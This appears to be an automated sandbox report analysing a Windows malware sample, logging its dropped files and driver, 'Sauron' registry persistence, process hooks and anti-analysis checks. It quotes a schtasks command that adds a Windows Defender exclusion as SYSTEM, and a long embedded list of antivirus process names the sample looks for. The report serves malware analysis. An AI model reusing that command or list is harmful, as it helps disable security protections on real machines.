0000002F.00000002.3379229347.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, 2dHqG0.exe, 00000030.00000002.3386248776.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000030.00000000.3380355601.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe.7.dr, pw8XjN.exe.40.dr
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 2o63254452-763487230.06.exe, 00000000.00000003.2163760309.0000000004882000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2125107518.0000000004881000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163675953.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, 2o63254452-763487230.06.exe, 00000000.00000003.2163570834.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, BEqRkb.exe, 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000004.00000000.2265682349.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000005.00000000.2272964825.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000005.00000002.2278285025.0000000140014000.00000002.00000001.01000000.00000008.sdmp, BEqRkb.exe, 00000007.00000000.2775277441.0000000140014000.00000002.00000001.01000000.00000008.sdmp
              Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Detected unpacking (creates a PE file in dynamic memory)
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeUnpacked PE file: 40.2.2dHqG0.exe.2540000.3.unpack
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000
              Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.40.drStatic PE information: section name: .mo:
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_00B22691 push ecx; ret 40_2_00B226A4
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_02552254 push ecx; ret 40_2_02552267
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: 42_2_006C2691 push ecx; ret 42_2_006C26A4

              Persistence and Installation Behavior

              barindex
              Drops PE files to the document folder of the user
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\Documents\BEqRkb.exeJump to dropped file
              Sample is not signed and drops a device driver
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile created: C:\Program Files (x86)\2dHqG0\2dHqG0.exeJump to dropped file
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
              Source: C:\Users\user\Documents\BEqRkb.exeFile created: C:\Program Files (x86)\2dHqG0\tbcore3U.dllJump to dropped file
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeFile created: C:\Program Files (x86)\8srsV\tbcore3U.dllJump to dropped file
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\Documents\BEqRkb.exeJump to dropped file
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeFile created: C:\Program Files (x86)\8srsV\pw8XjN.exeJump to dropped file
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

              Boot Survival

              barindex
              Creates an undocumented autostart registry key
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\SauronJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520

              Hooking and other Techniques for Hiding and Protection

              barindex
              Overwrites code with unconditional jumps - possibly settings hooks in foreign process
              Source: C:\Users\user\Documents\BEqRkb.exeMemory written: PID: 8164 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeMemory written: PID: 8164 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeMemory written: PID: 8188 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeMemory written: PID: 8188 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeMemory written: PID: 5776 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeMemory written: PID: 5776 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 5576 base: 8A0005 value: E9 8B 2F 66 76 Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 5576 base: 76F02F90 value: E9 7A D0 99 89 Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 5576 base: DC0005 value: E9 8B 2F 14 76 Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 5576 base: 76F02F90 value: E9 7A D0 EB 89 Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 5268 base: FE0005 value: E9 8B 2F F2 75
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 5268 base: 76F02F90 value: E9 7A D0 0D 8A
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeMemory written: PID: 6112 base: 6B0005 value: E9 8B 2F 85 76
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeMemory written: PID: 6112 base: 76F02F90 value: E9 7A D0 7A 89
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 8084 base: 960005 value: E9 8B 2F 5A 76
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 8084 base: 76F02F90 value: E9 7A D0 A5 89
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeMemory written: PID: 7624 base: 1130005 value: E9 8B 2F DD 75
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeMemory written: PID: 7624 base: 76F02F90 value: E9 7A D0 22 8A
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeMemory written: PID: 2520 base: FC0005 value: E9 8B 2F F4 75
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeMemory written: PID: 2520 base: 76F02F90 value: E9 7A D0 0B 8A
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 940 base: 1650005 value: E9 8B 2F 8B 75
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeMemory written: PID: 940 base: 76F02F90 value: E9 7A D0 74 8A
              Source: C:\Users\user\Documents\BEqRkb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C5590FC
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C575143
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C55A03F
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C679F9E
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C5A87B1
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C618647
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C558B19
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C4CDE34
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 33640CE
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 37491F3
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 3341F74
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 37E01D5
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 34097BB
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 3765654
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 33310CD
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C661EB4
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C59F34F
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE687AA
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE33E38
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BF2B056
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE5F34F
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C57FFCB
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C686E74
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C5B080B
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C5B2089
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE0F12B
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE72089
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE18B19
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BF66565
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BF1A702
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BF2CBDE
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BF582C1
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C6A6565
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C6B91B6
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BEAF839
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BED8647
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE387AA
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE03E38
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE8183C
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE2F34F
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BF491B6
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE7F839
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BF16E74
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeAPI/Special instruction interceptor: Address: 6BE42089
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C6C7C0E
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C6982C1
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeAPI/Special instruction interceptor: Address: 6C5A87AA
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
              Source: 2dHqG0.exe, 00000028.00000002.3515359627.000000000306D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeRDTSC instruction interceptor: First address: 140001190 second address: 1400011A7 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeRDTSC instruction interceptor: First address: 1400011A7 second address: 1400011A7 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FE98481ADE0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
              Source: C:\Users\user\Documents\BEqRkb.exeRDTSC instruction interceptor: First address: 538E55 second address: 538E63 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
              Source: C:\Users\user\Documents\BEqRkb.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_4-14013
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_40-3866
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_42-3247
              Source: C:\Users\user\Documents\BEqRkb.exeAPI coverage: 2.7 %
              Source: C:\Users\user\Documents\BEqRkb.exe TID: 1344Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exe TID: 1060Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A51A1B8 FindFirstFileExW,4_2_00007FFE1A51A1B8
              Source: C:\Users\user\Documents\BEqRkb.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: BEqRkb.exe, 00000007.00000003.2985203284.000000000052A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 2dHqG0.exe, 00000028.00000002.3513701464.00000000007F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Documents\BEqRkb.exeAPI call chain: ExitProcess graph end nodegraph_4-14014
              Source: C:\Users\user\Documents\BEqRkb.exeAPI call chain: ExitProcess graph end nodegraph_4-14358
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400073E0 LdrLoadDll,4_2_00000001400073E0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0000000140007C91
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_3_02540643 mov eax, dword ptr fs:[00000030h]40_3_02540643
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_3_025400CD mov eax, dword ptr fs:[00000030h]40_3_025400CD
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_3_02440643 mov eax, dword ptr fs:[00000030h]40_3_02440643
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_3_024400CD mov eax, dword ptr fs:[00000030h]40_3_024400CD
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,4_2_0000000140004630
              Source: C:\Users\user\Documents\BEqRkb.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0000000140007C91
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000001400106B0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,4_2_00000001400092E0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A5176E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFE1A5176E0
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A511F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFE1A511F50
              Source: C:\Users\user\Documents\BEqRkb.exeCode function: 4_2_00007FFE1A512630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFE1A512630
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_00B22AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00B22AE2
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_00B210CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00B210CC
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_00B251FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00B251FB
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeCode function: 40_2_02541640 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_02541640
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: 42_2_006C2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_006C2AE2
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeCode function: 42_2_006C10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_006C10CC
